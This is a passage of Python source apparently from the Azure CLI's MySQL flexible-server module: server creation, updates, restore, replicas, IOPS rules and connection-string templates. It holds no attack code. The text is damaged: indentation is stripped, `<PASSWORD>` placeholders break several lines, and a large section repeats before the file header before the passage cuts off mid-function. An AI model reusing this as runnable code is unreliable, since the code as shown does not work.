instance.maintenance_window.day_of_week = day_of_week
instance.maintenance_window.start_hour = start_hour
instance.maintenance_window.start_minute = start_minute
instance.maintenance_window.custom_window = custom_window
return ServerForUpdate(maintenance_window=instance.maintenance_window)
params = ServerForUpdate(sku=instance.sku,
storage_profile=instance.storage_profile,
administrator_login_password=<PASSWORD>,
ssl_enforcement=ssl_enforcement,
delegated_subnet_arguments=instance.delegated_subnet_arguments,
tags=tags,
ha_enabled=ha_enabled,
replication_role=replication_role)
if assign_identity:
if server_module_path.find('mysql'):
if instance.identity is None:
instance.identity = mysql_flexibleservers.models.Identity()
params.identity = instance.identity
return params
def server_delete_func(cmd, client, resource_group_name=None, server_name=None, yes=None):
confirm = yes
result = None # default return value
if not yes:
confirm = user_confirmation(
"Are you sure you want to delete the server '{0}' in resource group '{1}'".format(server_name,
resource_group_name),
yes=yes)
if confirm:
try:
result = client.begin_delete(resource_group_name, server_name)
if cmd.cli_ctx.local_context.is_on:
local_context_file = cmd.cli_ctx.local_context._get_local_context_file() # pylint: disable=protected-access
local_context_file.remove_option('mysql flexible-server', 'server_name')
local_context_file.remove_option('mysql flexible-server', 'administrator_login')
local_context_file.remove_option('mysql flexible-server', 'database_name')
except Exception as ex: # pylint: disable=broad-except
logger.error(ex)
raise CLIError(ex)
return result
# Parameter update command
def flexible_parameter_update(client, server_name, configuration_name, resource_group_name, source=None, value=None):
if source is None and value is None:
# update the command with system default
try:
parameter = client.get(resource_group_name, server_name, configuration_name)
value = parameter.default_value # reset value to default
source = "system-default"
except CloudError as e:
raise CLIError('Unable to get default parameter value: {}.'.format(str(e)))
elif source is None:
source = "user-override"
parameters = mysql_flexibleservers.models.Configuration(
name=configuration_name,
value=value,
source=source
)
return client.begin_update(resource_group_name, server_name, configuration_name, parameters)
# Replica commands
# Custom functions for server replica, will add PostgreSQL part after backend ready in future
def flexible_replica_create(cmd, client, resource_group_name, replica_name, server_name, no_wait=False, location=None, sku_name=None, tier=None, **kwargs):
provider = 'Microsoft.DBforMySQL'
# set source server id
if not is_valid_resource_id(server_name):
if len(server_name.split('/')) == 1:
server_name = resource_id(subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace=provider,
type='flexibleServers',
name=server_name)
else:
raise CLIError('The provided source-server {} is invalid.'.format(server_name))
source_server_id_parts = parse_resource_id(server_name)
try:
source_server_object = client.get(source_server_id_parts['resource_group'], source_server_id_parts['name'])
except CloudError as e:
raise CLIError('Unable to get source server: {}.'.format(str(e)))
location = source_server_object.location
sku_name = source_server_object.sku.name
tier = source_server_object.sku.tier
parameters = mysql_flexibleservers.models.Server(
sku=mysql_flexibleservers.models.Sku(name=sku_name, tier=tier),
source_server_id=server_name,
location=location,
create_mode="Replica")
return sdk_no_wait(no_wait, client.begin_create, resource_group_name, replica_name, parameters)
def flexible_replica_stop(client, resource_group_name, server_name):
try:
server_object = client.get(resource_group_name, server_name)
except Exception as e:
raise CLIError('Unable to get server: {}.'.format(str(e)))
if server_object.replication_role is not None and server_object.replication_role.lower() != "replica":
raise CLIError('Server {} is not a replica server.'.format(server_name))
from importlib import import_module
server_module_path = server_object.__module__
module = import_module(server_module_path) # replacement not needed for update in flex servers
ServerForUpdate = getattr(module, 'ServerForUpdate')
params = ServerForUpdate(replication_role='None')
return client.begin_update(resource_group_name, server_name, params)
def flexible_server_mysql_get(cmd, resource_group_name, server_name):
client = get_mysql_flexible_management_client(cmd.cli_ctx)
return client.servers.get(resource_group_name, server_name)
def flexible_list_skus(cmd, client, location):
result = client.list(location)
logger.warning('For prices please refer to https://aka.ms/mysql-pricing')
return result
def _create_server(db_context, cmd, resource_group_name, server_name, location, backup_retention, sku_name, tier,
storage_mb, administrator_login, administrator_login_password, version, tags,
delegated_subnet_arguments,
assign_identity, public_network_access, ha_enabled, availability_zone, iops):
logging_name, server_client = db_context.logging_name, db_context.server_client
logger.warning('Creating %s Server \'%s\' in group \'%s\'...', logging_name, server_name, resource_group_name)
logger.warning('Your server \'%s\' is using sku \'%s\' (Paid Tier). '
'Please refer to https://aka.ms/mysql-pricing for pricing details', server_name, sku_name)
# Note : passing public-network-access has no effect as the accepted values are 'Enabled' and 'Disabled'.
# So when you pass an IP here(from the CLI args of public_access), it ends up being ignored.
parameters = mysql_flexibleservers.models.Server(
sku=mysql_flexibleservers.models.Sku(name=sku_name, tier=tier),
administrator_login=administrator_login,
administrator_login_password=<PASSWORD>,
version=version,
public_network_access=public_network_access,
storage_profile=mysql_flexibleservers.models.StorageProfile(
backup_retention_days=backup_retention,
storage_mb=storage_mb,
storage_iops=iops),
location=location,
create_mode="Default",
delegated_subnet_arguments=delegated_subnet_arguments,
ha_enabled=ha_enabled,
availability_zone=availability_zone,
tags=tags)
if assign_identity:
parameters.identity = mysql_flexibleservers.models.Identity()
return resolve_poller(
server_client.begin_create(resource_group_name, server_name, parameters), cmd.cli_ctx,
'{} Server Create'.format(logging_name))
def flexible_server_connection_string(
server_name='{server}', database_name='{database}', administrator_login='{login}',
administrator_login_password='{password}'):
host = '{}.mysql.database.azure.com'.format(server_name)
if database_name is None:
database_name = 'mysql'
return {
'connectionStrings': _create_mysql_connection_strings(host, administrator_login, administrator_login_password,
database_name)
}
def _create_mysql_connection_strings(host, user, password, database):
result = {
'mysql_cmd': "mysql {database} --host {host} --user {user} --password={password}",
'ado.net': "Server={host}; Port=3306; Database={database}; Uid={user}; Pwd={password};",
'jdbc': "jdbc:mysql://{host}:3306/{database}?user={user}&password={password}",
'jdbc Spring': "spring.datasource.url=jdbc:mysql://{host}:3306/{database} "
"spring.datasource.username={user} "
"spring.datasource.password={password}",
'node.js': "var conn = mysql.createConnection({{host: '{host}', user: '{user}', "
"password: {password}, database: {database}, port: 3306}});",
'php': "host={host} port=3306 dbname={database} user={user} password={password}",
'python': "cnx = mysql.connector.connect(user='{user}', password='{password}', host='{host}', "
"port=3306, database='{database}')",
'ruby': "client = Mysql2::Client.new(username: '{user}', password: '{password}', "
"database: '{database}', host: '{host}', port: 3306)",
}
connection_kwargs = {
'host': host,
'user': user,
'password': password if password is not None else '{password}',
'database': database
}
for k, v in result.items():
result[k] = v.format(**connection_kwargs)
return result
def _form_response(username, sku, location, server_id, host, version, password, connection_string, database_name,
firewall_id=None, subnet_id=None):
output = {
'host': host,
'username': username,
'password': password,
'skuname': sku,
'location': location,
'id': server_id,
'version': version,
'databaseName': database_name,
'connectionString': connection_string
}
if firewall_id is not None:
output['firewallName'] = firewall_id
if subnet_id is not None:
output['subnetId'] = subnet_id
return output
def _update_local_contexts(cmd, server_name, resource_group_name, location, user):
if cmd.cli_ctx.local_context.is_on:
cmd.cli_ctx.local_context.set(['mysql flexible-server'], 'server_name',
server_name) # Setting the server name in the local context
cmd.cli_ctx.local_context.set([ALL], 'location',
location) # Setting the location in the local context
cmd.cli_ctx.local_context.set([ALL], 'resource_group_name', resource_group_name)
cmd.cli_ctx.local_context.set(['mysql flexible-server'], 'administrator_login',
user) # Setting the server name in the local context
def _create_database(db_context, cmd, resource_group_name, server_name, database_name):
# check for existing database, create if not
cf_db, logging_name = db_context.cf_db, db_context.logging_name
database_client = cf_db(cmd.cli_ctx, None)
try:
database_client.get(resource_group_name, server_name, database_name)
except ResourceNotFoundError:
logger.warning('Creating %s database \'%s\'...', logging_name, database_name)
parameters = {
'name': database_name,
'charset': 'utf8',
'collation': 'utf8_general_ci'
}
resolve_poller(
database_client.begin_create_or_update(resource_group_name, server_name, database_name, parameters), cmd.cli_ctx,
'{} Database Create/Update'.format(logging_name))
def database_create_func(client, resource_group_name=None, server_name=None, database_name=None, charset=None, collation=None):
if charset is None and collation is None:
charset = 'utf8'
collation = 'utf8_general_ci'
logger.warning("Creating database with utf8 charset and utf8_general_ci collation")
elif (not charset and collation) or (charset and not collation):
raise RequiredArgumentMissingError("charset and collation have to be input together.")
parameters = {
'name': database_name,
'charset': charset,
'collation': collation
}
return client.begin_create_or_update(
resource_group_name,
server_name,
database_name,
parameters)
def _create_mysql_connection_string(host, database_name, user_name, password):
connection_kwargs = {
'host': host,
'dbname': database_name,
'username': user_name,
'password': password if password is not None else '{password}'
}
return 'mysql {dbname} --host {host} --user {username} --password={password}'.format(**connection_kwargs)
def _determine_iops(storage_gb, iops_info, iops, tier, sku_name):
default_iops = 100
max_supported_iops = iops_info[tier][sku_name]
free_storage_iops = storage_gb * 3
if iops is None:
return default_iops
if iops < default_iops:
if iops <= free_storage_iops:
iops = max(default_iops, min(max_supported_iops, free_storage_iops))
logger.warning('Your IOPS input is below the free IOPS provided. Provisioning the server with free %s IOPS...', iops)
elif iops > free_storage_iops:
iops = default_iops
logger.warning('The min IOPS is %s. Provisioning the server with %s...', iops, iops)
elif iops > max_supported_iops:
iops = max_supported_iops
logger.warning('The max IOPS for your sku is %s. Provisioning the server with %s IOPS...', iops, iops)
elif default_iops <= iops <= free_storage_iops:
iops = min(free_storage_iops, max_supported_iops)
logger.warning('Your IOPS input is below the free IOPS provided. Provisioning the server with %s free IOPS...', iops)
return iops
# pylint: disable=too-many-instance-attributes, too-few-public-methods, useless-object-inheritance
class DbContext(object):
def __init__(self, azure_sdk=None, logging_name=None, cf_firewall=None, cf_db=None,
command_group=None, server_client=None):
self.azure_sdk = azure_sdk
self.cf_firewall = cf_firewall
self.cf_db = cf_db
self.logging_name = logging_name
self.command_group = command_group
self.server_client = server_client
|
<filename>src/azure-cli/azure/cli/command_modules/rdbms/flexible_server_custom_mysql.py
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=unused-argument, line-too-long
import datetime as dt
from datetime import datetime
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import resource_id, is_valid_resource_id, parse_resource_id # pylint: disable=import-error
from knack.log import get_logger
from azure.core.exceptions import ResourceNotFoundError
from azure.cli.core.azclierror import RequiredArgumentMissingError
from azure.cli.core.commands.client_factory import get_subscription_id
from azure.cli.core.util import CLIError, sdk_no_wait
from azure.cli.core.local_context import ALL
from azure.mgmt.rdbms import mysql_flexibleservers
from ._client_factory import get_mysql_flexible_management_client, cf_mysql_flexible_firewall_rules, \
cf_mysql_flexible_db
from ._flexible_server_util import resolve_poller, generate_missing_parameters, create_firewall_rule, \
parse_public_access_input, generate_password, parse_maintenance_window, get_mysql_list_skus_info, \
DEFAULT_LOCATION_MySQL
from .flexible_server_custom_common import user_confirmation
from .flexible_server_virtual_network import create_vnet, prepare_vnet
from .validators import mysql_arguments_validator
logger = get_logger(__name__)
DEFAULT_DB_NAME = 'flexibleserverdb'
DELEGATION_SERVICE_NAME = "Microsoft.DBforMySQL/flexibleServers"
# region create without args
# pylint: disable=too-many-locals, too-many-statements
def flexible_server_create(cmd, client, resource_group_name=None, server_name=None, sku_name=None, tier=None,
location=None, storage_mb=None, administrator_login=None,
administrator_login_password=<PASSWORD>, version=None,
backup_retention=None, tags=None, public_access=None, database_name=None,
subnet_arm_resource_id=None, high_availability=None, zone=None, assign_identity=False,
vnet_resource_id=None, vnet_address_prefix=None, subnet_address_prefix=None, iops=None):
# validator
if location is None:
location = DEFAULT_LOCATION_MySQL
sku_info, iops_info = get_mysql_list_skus_info(cmd, location)
mysql_arguments_validator(tier, sku_name, storage_mb, backup_retention, sku_info, version=version)
db_context = DbContext(
azure_sdk=mysql_flexibleservers, cf_firewall=cf_mysql_flexible_firewall_rules, cf_db=cf_mysql_flexible_db,
logging_name='MySQL', command_group='mysql', server_client=client)
# Raise error when user passes values for both parameters
if subnet_arm_resource_id is not None and public_access is not None:
raise CLIError("Incorrect usage : A combination of the parameters --subnet "
"and --public_access is invalid. Use either one of them.")
# When address space parameters are passed, the only valid combination is : --vnet, --subnet, --vnet-address-prefix, --subnet-address-prefix
# pylint: disable=too-many-boolean-expressions
if (vnet_address_prefix is not None) or (subnet_address_prefix is not None):
if (((vnet_address_prefix is not None) and (subnet_address_prefix is None)) or
((vnet_address_prefix is None) and (subnet_address_prefix is not None)) or
((vnet_address_prefix is not None) and (subnet_address_prefix is not None) and
((vnet_resource_id is None) or (subnet_arm_resource_id is None)))):
raise CLIError("Incorrect usage : "
"--vnet, --subnet, --vnet-address-prefix, --subnet-address-prefix must be supplied together.")
server_result = firewall_id = subnet_id = None
# Populate desired parameters
location, resource_group_name, server_name = generate_missing_parameters(cmd, location, resource_group_name,
server_name, 'mysql')
server_name = server_name.lower()
# Handle Vnet scenario
if (subnet_arm_resource_id is not None) or (vnet_resource_id is not None):
subnet_id = prepare_vnet(cmd, server_name, vnet_resource_id, subnet_arm_resource_id, resource_group_name,
location, DELEGATION_SERVICE_NAME, vnet_address_prefix, subnet_address_prefix)
delegated_subnet_arguments = mysql_flexibleservers.models.DelegatedSubnetArguments(
subnet_arm_resource_id=subnet_id)
elif public_access is None and subnet_arm_resource_id is None and vnet_resource_id is None:
subnet_id = create_vnet(cmd, server_name, location, resource_group_name,
DELEGATION_SERVICE_NAME)
delegated_subnet_arguments = mysql_flexibleservers.models.DelegatedSubnetArguments(
subnet_arm_resource_id=subnet_id)
else:
delegated_subnet_arguments = None
# calculate IOPS
iops = _determine_iops(storage_mb, iops_info, iops, tier, sku_name)
storage_mb *= 1024 # storage input comes in GiB value
administrator_login_password = <PASSWORD>(administrator_login_password)
if server_result is None:
# Create mysql server
# Note : passing public_access has no effect as the accepted values are 'Enabled' and 'Disabled'. So the value ends up being ignored.
server_result = _create_server(db_context, cmd, resource_group_name, server_name, location,
backup_retention,
sku_name, tier, storage_mb, administrator_login,
administrator_login_password,
version, tags, delegated_subnet_arguments, assign_identity, public_access,
high_availability, zone, iops)
# Adding firewall rule
if public_access is not None and str(public_access).lower() != 'none':
if str(public_access).lower() == 'all':
start_ip, end_ip = '0.0.0.0', '255.255.255.255'
else:
start_ip, end_ip = parse_public_access_input(public_access)
firewall_id = create_firewall_rule(db_context, cmd, resource_group_name, server_name, start_ip, end_ip)
# Create mysql database if it does not exist
if database_name is None:
database_name = DEFAULT_DB_NAME
_create_database(db_context, cmd, resource_group_name, server_name, database_name)
user = server_result.administrator_login
server_id = server_result.id
loc = server_result.location
version = server_result.version
sku = server_result.sku.name
host = server_result.fully_qualified_domain_name
logger.warning('Make a note of your password. If you forget, you would have to reset your password with'
'\'az mysql flexible-server update -n %s -g %s -p <new-password>\'.',
server_name, resource_group_name)
_update_local_contexts(cmd, server_name, resource_group_name, location, user)
return _form_response(user, sku, loc, server_id, host, version,
administrator_login_password if administrator_login_password is not None else '*****',
_create_mysql_connection_string(host, database_name, user, administrator_login_password),
database_name, firewall_id, subnet_id)
def flexible_server_restore(cmd, client, resource_group_name, server_name, source_server, restore_point_in_time, location=None, no_wait=False):
provider = 'Microsoft.DBforMySQL'
if not is_valid_resource_id(source_server):
if len(source_server.split('/')) == 1:
source_server = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace=provider,
type='flexibleServers',
name=source_server)
else:
raise ValueError('The provided source-server {} is invalid.'.format(source_server))
try:
restore_point_in_time = datetime.strptime(restore_point_in_time, "%Y-%m-%dT%H:%M:%S.%f+00:00")
except ValueError:
restore_point_in_time = datetime.strptime(restore_point_in_time, "%Y-%m-%dT%H:%M:%S+00:00")
restore_point_in_time = restore_point_in_time.replace(tzinfo=dt.timezone.utc)
parameters = mysql_flexibleservers.models.Server(
source_server_id=source_server,
restore_point_in_time=restore_point_in_time,
location=location,
create_mode="PointInTimeRestore"
)
# Retrieve location from same location as source server
id_parts = parse_resource_id(source_server)
try:
source_server_object = client.get(id_parts['resource_group'], id_parts['name'])
parameters.location = source_server_object.location
except Exception as e:
raise ValueError('Unable to get source server: {}.'.format(str(e)))
return sdk_no_wait(no_wait, client.begin_create, resource_group_name, server_name, parameters)
# pylint: disable=too-many-branches
def flexible_server_update_custom_func(cmd, instance,
sku_name=None,
tier=None,
storage_mb=None,
backup_retention=None,
administrator_login_password=<PASSWORD>,
ssl_enforcement=None,
subnet_arm_resource_id=None,
tags=None,
auto_grow=None,
assign_identity=False,
ha_enabled=None,
replication_role=None,
maintenance_window=None,
iops=None):
# validator
location = ''.join(instance.location.lower().split())
sku_info, iops_info = get_mysql_list_skus_info(cmd, location)
mysql_arguments_validator(tier, sku_name, storage_mb, backup_retention, sku_info, instance=instance)
from importlib import import_module
server_module_path = instance.__module__
module = import_module(server_module_path) # replacement not needed for update in flex servers
ServerForUpdate = getattr(module, 'ServerForUpdate')
if storage_mb:
instance.storage_profile.storage_mb = storage_mb * 1024
sku_rank = {'Standard_B1s': 1, 'Standard_B1ms': 2, 'Standard_B2s': 3, 'Standard_D2ds_v4': 4,
'Standard_D4ds_v4': 5, 'Standard_D8ds_v4': 6,
'Standard_D16ds_v4': 7, 'Standard_D32ds_v4': 8, 'Standard_D48ds_v4': 9, 'Standard_D64ds_v4': 10,
'Standard_E2ds_v4': 11,
'Standard_E4ds_v4': 12, 'Standard_E8ds_v4': 13, 'Standard_E16ds_v4': 14, 'Standard_E32ds_v4': 15,
'Standard_E48ds_v4': 16,
'Standard_E64ds_v4': 17}
if location == 'eastus2euap':
sku_rank.update({
'Standard_D2s_v3': 4,
'Standard_D4s_v3': 5, 'Standard_D8s_v3': 6,
'Standard_D16s_v3': 7, 'Standard_D32s_v3': 8, 'Standard_D48s_v3': 9, 'Standard_D64s_v3': 10,
'Standard_E2s_v3': 11,
'Standard_E4s_v3': 12, 'Standard_E8s_v3': 13, 'Standard_E16s_v3': 14, 'Standard_E32s_v3': 15,
'Standard_E48s_v3': 16,
'Standard_E64s_v3': 17
})
if iops:
if (tier is not None and sku_name is None) or (tier is None and sku_name is not None):
raise CLIError('Argument Error. If you pass --tier, --sku_name is a mandatory parameter and vice-versa.')
if tier is None and sku_name is None:
iops = _determine_iops(instance.storage_profile.storage_mb // 1024, iops_info, iops, instance.sku.tier, instance.sku.name)
else:
new_sku_rank = sku_rank[sku_name]
old_sku_rank = sku_rank[instance.sku.name]
supplied_iops = iops
max_allowed_iops_new_sku = iops_info[tier][sku_name]
default_iops = 100
free_iops = (instance.storage_profile.storage_mb // 1024) * 3
# Downgrading SKU
if new_sku_rank < old_sku_rank:
if supplied_iops > max_allowed_iops_new_sku:
iops = max_allowed_iops_new_sku
logger.warning('The max IOPS for your sku is %s. Provisioning the server with %s...', iops, iops)
elif supplied_iops < default_iops:
if free_iops < default_iops:
iops = default_iops
logger.warning('The min IOPS is %s. Provisioning the server with %s...', default_iops,
default_iops)
else:
iops = min(max_allowed_iops_new_sku, free_iops)
logger.warning('Updating the server with %s free IOPS...', iops)
else: # Upgrading SKU
if supplied_iops > max_allowed_iops_new_sku:
iops = max_allowed_iops_new_sku
logger.warning(
'The max IOPS for your sku is %s. Provisioning the server with %s...', iops, iops)
elif supplied_iops <= max_allowed_iops_new_sku:
iops = max(supplied_iops, min(free_iops, max_allowed_iops_new_sku))
if iops != supplied_iops:
logger.warning('Updating the server with %s free IOPS...', iops)
elif supplied_iops < default_iops:
if free_iops < default_iops:
iops = default_iops
logger.warning(
'The min IOPS is %s. Updating the server with %s...', default_iops, default_iops)
else:
iops = min(max_allowed_iops_new_sku, free_iops)
logger.warning('Updating the server with %s free IOPS...', iops)
instance.sku.name = sku_name
instance.sku.tier = tier
instance.storage_profile.storage_iops = iops
# pylint: disable=too-many-boolean-expressions
if (iops is None and tier is None and sku_name) or (iops is None and sku_name is None and tier):
raise CLIError('Argument Error. If you pass --tier, --sku_name is a mandatory parameter and vice-versa.')
if iops is None and sku_name and tier:
new_sku_rank = sku_rank[sku_name]
old_sku_rank = sku_rank[instance.sku.name]
instance.sku.name = sku_name
instance.sku.tier = tier
max_allowed_iops_new_sku = iops_info[tier][sku_name]
iops = instance.storage_profile.storage_iops
if new_sku_rank < old_sku_rank: # Downgrading
if instance.storage_profile.storage_iops > max_allowed_iops_new_sku:
iops = max_allowed_iops_new_sku
logger.warning('Updating the server with max %s IOPS...', iops)
else: # Upgrading
if instance.storage_profile.storage_iops < (instance.storage_profile.storage_mb // 1024) * 3:
iops = min(max_allowed_iops_new_sku, (instance.storage_profile.storage_mb // 1024) * 3)
logger.warning('Updating the server with free %s IOPS...', iops)
instance.storage_profile.storage_iops = iops
if backup_retention:
instance.storage_profile.backup_retention_days = backup_retention
if auto_grow:
instance.storage_profile.storage_autogrow = auto_grow
if subnet_arm_resource_id:
instance.delegated_subnet_arguments.subnet_arm_resource_id = subnet_arm_resource_id
if maintenance_window:
logger.warning('If you are updating maintenancw window with other parameter, maintenance window will be updated first. Please update the other parameters later.')
# if disabled is pass in reset to default values
if maintenance_window.lower() == "disabled":
day_of_week = start_hour = start_minute = 0
custom_window = "Disabled"
else:
day_of_week, start_hour, start_minute = parse_maintenance_window(maintenance_window)
custom_window = "Enabled"
# set values - if maintenance_window when is None when created then create a new object
if instance.maintenance_window is None:
instance.maintenance_window = mysql_flexibleservers.models.MaintenanceWindow(
day_of_week=day_of_week,
start_hour=start_hour,
start_minute=start_minute,
custom_window=custom_window
)
else:
instance.maintenance_window.day_of_week = day_of_week
instance.maintenance_window.start_hour = start_hour
instance.maintenance_window.start_minute = start_minute
instance.maintenance_window.custom_window = custom_window
return ServerForUpdate(maintenance_window=instance.maintenance_window)
params = ServerForUpdate(sku=instance.sku,
storage_profile=instance.storage_profile,
administrator_login_password=<PASSWORD>,
ssl_enforcement=ssl_enforcement,
delegated_subnet_arguments=instance.delegated_subnet_arguments,
tags=tags,
ha_enabled=ha_enabled,
replication_role=replication_role)
if assign_identity:
if server_module_path.find('mysql'):
if instance.identity is None:
instance.identity = mysql_flexibleservers.models.Identity()
params.identity = instance.identity
return params
def server_delete_func(cmd, client, resource_group_name=None, server_name=None, yes=None):
confirm = yes
result = None # default return value
if not yes:
confirm = user_confirmation(
"Are you sure you want to delete the server '{0}' in resource group '{1}'".format(server_name,
resource_group_name),
yes=yes)
if confirm:
try:
result = client.begin_delete(resource_group_name, server_name)
if cmd.cli_ctx.local_context.is_on:
local_context_file = cmd.cli_ctx.local_context._get_local_context_file() # pylint: disable=protected-access
local_context_file.remove_option('mysql flexible-server', 'server_name')
local_context_file.remove_option('mysql flexible-server', 'administrator_login')
local_context_file.remove_option('mysql flexible-server', 'database_name')
except Exception as ex: # pylint: disable=broad-except
logger.error(ex)
raise CLIError(ex)
return result
# Parameter update command
def flexible_parameter_update(client, server_name, configuration_name, resource_group_name, source=None, value=None):
if source is None and value is None:
# update the command with system default
try:
parameter = client.get(resource_group_name, server_name, configuration_name)
value = parameter.default_value # reset value to default
source = "system-default"
except CloudError as e:
raise CLIError('Unable to get default parameter value: {}.'.format(str(e)))
elif source is None:
source = "user-override"
parameters = mysql_flexibleservers.models.Configuration(
name=configuration_name,
value=value,
source=source
)
return client.begin_update(resource_group_name, server_name, configuration_name, parameters)
# Replica commands
# Custom functions for server replica, will add PostgreSQL part after backend ready in future
def flexible_replica_create(cmd, client, resource_group_name, replica_name, server_name, no_wait=False, location=None, sku_name=None, tier=None, **kwargs):
provider = 'Microsoft.DBforMySQL'
# set source server id
if not is_valid_resource_id(server_name):
if len(server_name.split('/')) == 1:
server_name = resource_id(subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace=provider,
type='flexibleServers',
name=server_name)
else:
raise CLIError('The provided source-server {} is invalid.'.format(server_name))
source_server_id_parts = parse_resource_id(server_name)
try:
source_server_object = client.get(source_server_id_parts['resource_group'], source_server_id_parts['name'])
except CloudError as e:
raise CLIError('Unable to get source server: {}.'.format(str(e)))
location = source_server_object.location
sku_name = source_server_object.sku.name
tier = source_server_object.sku.tier
parameters = mysql_flexibleservers.models.Server(
sku=mysql_flexibleservers.models.Sku(name=sku_name, tier=tier),
source_server_id=server_name,
location=location,
create_mode="Replica")
return sdk_no_wait(no_wait, client.begin_create, resource_group_name, replica_name, parameters)
def flexible_replica_stop(client, resource_group_name, server_name):
try:
server_object = client.get(resource_group_name, server_name)
except Exception as e:
raise CLIError('Unable to get server: {}.'.format(str(e)))
if server_object.replication_role is not None and server_object.replication_role.lower() != "replica":
raise CLIError('Server {} is not a replica server.'.format(server_name))
from importlib import import_module
server_module_path = server_object.__module__
module = import_module(server_module_path) # replacement not needed for update in flex servers
ServerForUpdate = getattr(module, 'ServerForUpdate')
params = ServerForUpdate(replication_role='None')
return client.begin_update(resource_group_name, server_name, params)
def flexible_server_mysql_get(cmd, resource_group_name, server_name):
client = get_mysql_flexible_management_client(cmd.cli_ctx)
return client.servers.get(resource_group_name, server_name)
def flexible_list_skus(cmd, client, location):
result = client.list(location)
logger.warning('For prices please refer to https://aka.ms/mysql-pricing')
return result
def _create_server(db_context, cmd, resource_group_name, server_name, location, backup_retention, sku_name, tier,
storage_mb, administrator_login, administrator_login_password, version, tags,
delegated_subnet_arguments,
assign_identity, public_network_access, ha_enabled, availability_zone, iops):
logging_name, server_client = db_context.logging_name, db_context.server_client
logger.warning('Creating %s Server \'%s\' in group \'%s\'...', logging_name, server_name, resource_group_name)
logger.warning('Your server \'%s\' is using sku \'%s\' (Paid Tier). '
'Please refer to https://aka.ms/mysql-pricing for pricing details', server_name, sku_name)
# Note : passing public-network-access has no effect as the accepted values are 'Enabled' and 'Disabled'.
# So when you pass an IP here(from the CLI args of public_access), it ends up being ignored.
parameters = mysql_flexibleservers.models.Server(
sku=mysql_flexibleservers.models.Sku(name=sku_name, tier=tier),
administrator_login=administrator_login,
administrator_login_password=<PASSWORD>,
version=version,
public_network_access=public_network_access,
storage_profile=mysql_flexibleservers.models.StorageProfile(
backup_retention_days=backup_retention,
storage_mb=storage_mb,
storage_iops=iops),
location=location,
create_mode="Default",
delegated_subnet_arguments=delegated_subnet_arguments,
ha_enabled=ha_enabled,
availability_zone=availability_zone,
tags=tags)
if assign_identity:
parameters.identity = mysql_flexibleservers.models.Identity()
return resolve_poller(
server_client.begin_create(resource_group_name, server_name, parameters), cmd.cli_ctx,
'{} Server Create'.format(logging_name))
def flexible_server_connection_string(
server_name='{server}', database_name='{database}', administrator_login='{login}',
administrator_login_password='{password}'):
host = '{}.mysql.database.azure.com'.format(server_name)
if database_name is None:
database_name = 'mysql'
return {
'connectionStrings': _create_mysql_connection_strings(host, administrator_login, administrator_login_password,
database_name)
}
def _create_mysql_connection_strings(host, user, password, database):
result = {
'mysql_cmd': "mysql {database} --host {host} --user {user} --password={password}",
'ado.net': "Server={host}; Port=3306; Database={database}; Uid={user}; Pwd={password};",
'jdbc': "jdbc:mysql://{host}:3306/{database}?user={user}&password={password}",
'jdbc Spring': "spring.datasource.url=jdbc:mysql://{host}:3306/{database} "
"spring.datasource.username={user} "
"spring.datasource.password={password}",
'node.js': "var conn = mysql.createConnection({{host: '{host}', user: '{user}', "
"password: {password}, database: {database}, port: 3306}});",
'php': "host={host} port=3306 dbname={database} user={user} password={password}",
'python': "cnx = mysql.connector.connect(user='{user}', password='{password}', host='{host}', "
"port=3306, database='{database}')",
'ruby': "client = Mysql2::Client.new(username: '{user}', password: '{password}', "
"database: '{database}', host: '{host}', port: 3306)",
}
connection_kwargs = {
'host': host,
'user': user,
'password': password if password is not None else '{password}',
'database': database
}
for k, v in result.items():
result[k] = v.format(**connection_kwargs)
return result
def _form_response(username, sku, location, server_id, host, version, password, connection_string, database_name,
firewall_id=None, subnet_id=None):
output = {
'host': host,
'username': username,
'password': password,
'skuname': sku,
'location': location,
'id': server_id,
'version': version,
'databaseName': database_name,
'connectionString': connection_string
}
if firewall_id is not None:
output['firewallName'] = firewall_id
if subnet_id is not None:
output['subnetId'] = subnet_id
return output
def _update_local_contexts(cmd, server_name, resource_group_name, location, user):
if cmd.cli_ctx.local_context.is_on:
cmd.cli_ctx.local_context.set(['mysql flexible-server'], 'server_name',
server_name) # Setting the server name in the local context
cmd.cli_ctx.local_context.set([ALL], 'location',
location) # Setting the location in the local context
cmd.cli_ctx.local_context.set([ALL], 'resource_group_name', resource_group_name)
cmd.cli_ctx.local_context.set(['mysql flexible-server'], 'administrator_login',
user) # Setting the server name in the local context
def _create_database(db_context, cmd, resource_group_name, server_name, database_name):
# check for existing database, create if not
cf_db, logging_name = db_context.cf_db, db_context.logging_name
database_client = cf_db(cmd.cli_ctx, None)
try:
database_client.get(resource_group_name, server_name, database_name)
except ResourceNotFoundError:
logger.warning('Creating %s database \'%s\'...', logging_name, database_name)
parameters = {
'name': database_name,
'charset': 'utf8',
'collation': 'utf8_general_ci'
}
resolve_poller(
database_client.begin_create_or_update(resource_group_name, server_name, database_name, parameters), cmd.cli_ctx,
'{} Database Create/Update'.format(logging_name))
def database_create_func(client, resource_group_name=None, server_name=None, database_name=None, charset=None, collation=None):
if charset is None and collation is None:
charset = 'utf8'
collation = 'utf8_general_ci'
logger.warning("Creating database with utf8 charset and utf8_general_ci collation")
elif (not charset and collation) or (charset and not collation):
raise RequiredArgumentMissingError("charset and collation have to be input together.")
parameters = {
'name': database_name,
'charset': charset,
'collation': collation
}
return client.begin_create_or_update(
resource_group_name,
server_name,
database_name,
parameters)
def _create_mysql_connection_string(host, database_name, user_name, password):
connection_kwargs = {
'host': host,
'dbname': database_name,
'username': user_name,
'password': password if password is not None else '{password}'
}
return 'mysql {dbname} --host {host} --user {username} --password={password}'.format(**connection_kwargs)
def _determine_iops(storage_gb, iops_info, iops, tier, sku_name):
default_iops = 100
max_supported_iops = iops_info[tier][sku_name]
free_storage_iops = storage_gb * 3
if iops is None:
return default_iops
if iops < default_iops:
if iops <= free_storage_iops:
iops = max(default_iops, min(max_supported_iops, free_storage_iops))
logger.warning('Your IOPS input is below the free IOPS provided. Provisioning the server with free %s IOPS...', iops)
elif iops > free_storage_iops:
iops = default_iops
logger.warning('The min IOPS is %s. Provisioning the server with %s...', iops, iops)
elif iops > max_supported_iops:
